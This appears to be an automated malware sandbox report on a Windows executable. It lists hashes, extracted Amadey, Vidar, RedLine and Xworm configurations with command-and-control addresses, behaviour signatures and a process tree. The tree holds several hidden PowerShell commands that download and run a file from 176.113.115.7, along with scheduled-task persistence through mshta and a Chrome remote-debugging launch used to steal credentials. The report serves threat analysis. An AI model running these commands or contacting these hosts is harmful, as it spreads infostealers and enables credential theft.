Overview

overview

10

Static

static

5

f6860e04c9...2c.exe

windows7-x64

10

f6860e04c9...2c.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 07:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f6860e04c99e9e38430b00d86e75bb2c.exe

  • Size

    938KB

  • MD5

    f6860e04c99e9e38430b00d86e75bb2c

  • SHA1

    074ed995aabe1d0c65658eb9eeab39ec3ca975dc

  • SHA256

    fc8add9758dbcc75ede35c3523929552359ff353921d79a299a0abc339c8a1ec

  • SHA512

    194edd616acbace1b206e928e39bd301a2e4ca01928888a5d054afa394ff3758afec905ce227b8aed91c0b9f67a1eac73c0d5ee3c1e90ce420dfb90623555144

  • SSDEEP

    24576:LqDEvCTbMWu7rQYlBQcBiT6rprG8a0F7u:LTvC/MTQYxsWR7a0F7

Score
10/10
amadeygcleanerredlinevidarxworm092155ir7amtestprolivcredential_accessdefense_evasiondiscoveryexecutioninfostealerloaderpersistenceratspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832
Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

redline

Botnet

testproliv

C2

45.155.103.183:1488

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:6666

5.180.155.29:6666
Mutex

O3GT6cT0bZJp53nK

Attributes
  • Install_directory

    %Temp%

  • install_file

    winservice.exe

aes.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Vidar Stealer 8 IoCs
    stealer
  • Detect Xworm Payload 1 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 1 IoCs
  • Redline family
    redline
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
    defense_evasion
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 21 IoCs
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 31 IoCs
  • Identifies Wine through registry keys 2 TTPs 14 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 47 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 11 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 30 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\f6860e04c99e9e38430b00d86e75bb2c.exe
    "C:\Users\Admin\AppData\Local\Temp\f6860e04c99e9e38430b00d86e75bb2c.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4804
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn 7peafmaiaHQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\5uoUfyY2R.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4020
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn 7peafmaiaHQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\5uoUfyY2R.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:836
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\5uoUfyY2R.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4448
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5052
        • C:\Users\Admin\AppData\Local\Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE
          "C:\Users\Admin\AppData\Local\Temp53MXFYGZAQDCZJQGIQ55QX1IWOX3RJ9X.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2388
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3004
            • C:\Users\Admin\AppData\Local\Temp\10099760101\28bc9d64cc.exe
              "C:\Users\Admin\AppData\Local\Temp\10099760101\28bc9d64cc.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:964
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn qgadGmaLdj8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\oKkAZea2s.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1500
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn qgadGmaLdj8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\oKkAZea2s.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:3988
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\oKkAZea2s.hta
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:532
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0B3ZLRTJ5LRU1ZMX1YSW1ZTGSWGYPOR4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1184
                  • C:\Users\Admin\AppData\Local\Temp0B3ZLRTJ5LRU1ZMX1YSW1ZTGSWGYPOR4.EXE
                    "C:\Users\Admin\AppData\Local\Temp0B3ZLRTJ5LRU1ZMX1YSW1ZTGSWGYPOR4.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:740
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10099770121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:732
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:1016
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4900
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4496
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4888
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2388
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1224
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2344
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "X2Td3maDMRc" /tr "mshta \"C:\Temp\EBi34P1oY.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:4396
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\EBi34P1oY.hta"
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4392
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3636
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:836
            • C:\Users\Admin\AppData\Local\Temp\10100160101\0781f1c15c.exe
              "C:\Users\Admin\AppData\Local\Temp\10100160101\0781f1c15c.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4816
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:4920
            • C:\Users\Admin\AppData\Local\Temp\10100170101\ce2f96f45b.exe
              "C:\Users\Admin\AppData\Local\Temp\10100170101\ce2f96f45b.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:3376
              • C:\Users\Admin\AppData\Local\Temp\10100170101\ce2f96f45b.exe
                "C:\Users\Admin\AppData\Local\Temp\10100170101\ce2f96f45b.exe"
                7⤵
                • Executes dropped EXE
                PID:4756
              • C:\Users\Admin\AppData\Local\Temp\10100170101\ce2f96f45b.exe
                "C:\Users\Admin\AppData\Local\Temp\10100170101\ce2f96f45b.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:868
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3376 -s 800
                7⤵
                • Program crash
                PID:4860
            • C:\Users\Admin\AppData\Local\Temp\10100180101\9684a95687.exe
              "C:\Users\Admin\AppData\Local\Temp\10100180101\9684a95687.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1880
            • C:\Users\Admin\AppData\Local\Temp\10100190101\3a808e3c99.exe
              "C:\Users\Admin\AppData\Local\Temp\10100190101\3a808e3c99.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2312
            • C:\Users\Admin\AppData\Local\Temp\10100200101\12c607b539.exe
              "C:\Users\Admin\AppData\Local\Temp\10100200101\12c607b539.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:716
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:1188
            • C:\Users\Admin\AppData\Local\Temp\10100210101\z3SJkC5.exe
              "C:\Users\Admin\AppData\Local\Temp\10100210101\z3SJkC5.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3960
              • C:\Windows\TEMP\{A56521B1-A267-4453-848B-69D7E80C1DC8}\.cr\z3SJkC5.exe
                "C:\Windows\TEMP\{A56521B1-A267-4453-848B-69D7E80C1DC8}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10100210101\z3SJkC5.exe" -burn.filehandle.attached=660 -burn.filehandle.self=716
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:828
                • C:\Windows\TEMP\{D0A823F0-125A-43CF-824A-00FD1C31C42E}\.ba\WiseTurbo.exe
                  C:\Windows\TEMP\{D0A823F0-125A-43CF-824A-00FD1C31C42E}\.ba\WiseTurbo.exe
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5076
                  • C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe
                    C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe
                    9⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    PID:3432
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\SysWOW64\cmd.exe
                      10⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: MapViewOfSection
                      PID:2280
                      • C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe
                        C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe
                        11⤵
                        • Loads dropped DLL
                        PID:3032
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
                          12⤵
                          • Enumerates system info in registry
                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:3868
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe5bb046f8,0x7ffe5bb04708,0x7ffe5bb04718
                            13⤵
                              PID:2956
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,4659392904471313588,9801916277721240524,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
                              13⤵
                                PID:5424
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,4659392904471313588,9801916277721240524,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 /prefetch:3
                                13⤵
                                  PID:5728
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,4659392904471313588,9801916277721240524,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
                                  13⤵
                                    PID:1716
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4659392904471313588,9801916277721240524,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
                                    13⤵
                                      PID:5428
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4659392904471313588,9801916277721240524,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
                                      13⤵
                                        PID:5220
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 748
                              8⤵
                              • Program crash
                              PID:4172
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 652
                              8⤵
                              • Program crash
                              PID:3776
                        • C:\Users\Admin\AppData\Local\Temp\10100220101\BXxKvLN.exe
                          "C:\Users\Admin\AppData\Local\Temp\10100220101\BXxKvLN.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          PID:836
                        • C:\Users\Admin\AppData\Local\Temp\10100230101\mAtJWNv.exe
                          "C:\Users\Admin\AppData\Local\Temp\10100230101\mAtJWNv.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:4352
                          • C:\Users\Admin\AppData\Local\Temp\10100230101\mAtJWNv.exe
                            "C:\Users\Admin\AppData\Local\Temp\10100230101\mAtJWNv.exe"
                            7⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Checks processor information in registry
                            PID:1904
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                              8⤵
                              • Uses browser remote debugging
                              • Enumerates system info in registry
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of FindShellTrayWindow
                              PID:4608
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe6489cc40,0x7ffe6489cc4c,0x7ffe6489cc58
                                9⤵
                                  PID:2512
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1928 /prefetch:2
                                  9⤵
                                    PID:4208
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2172,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2180 /prefetch:3
                                    9⤵
                                      PID:1856
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2264 /prefetch:8
                                      9⤵
                                        PID:4736
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1
                                        9⤵
                                        • Uses browser remote debugging
                                        PID:1536
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3416,i,11966040274549623697,1829115365031806163,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3196 /prefetch:1
                                        9⤵
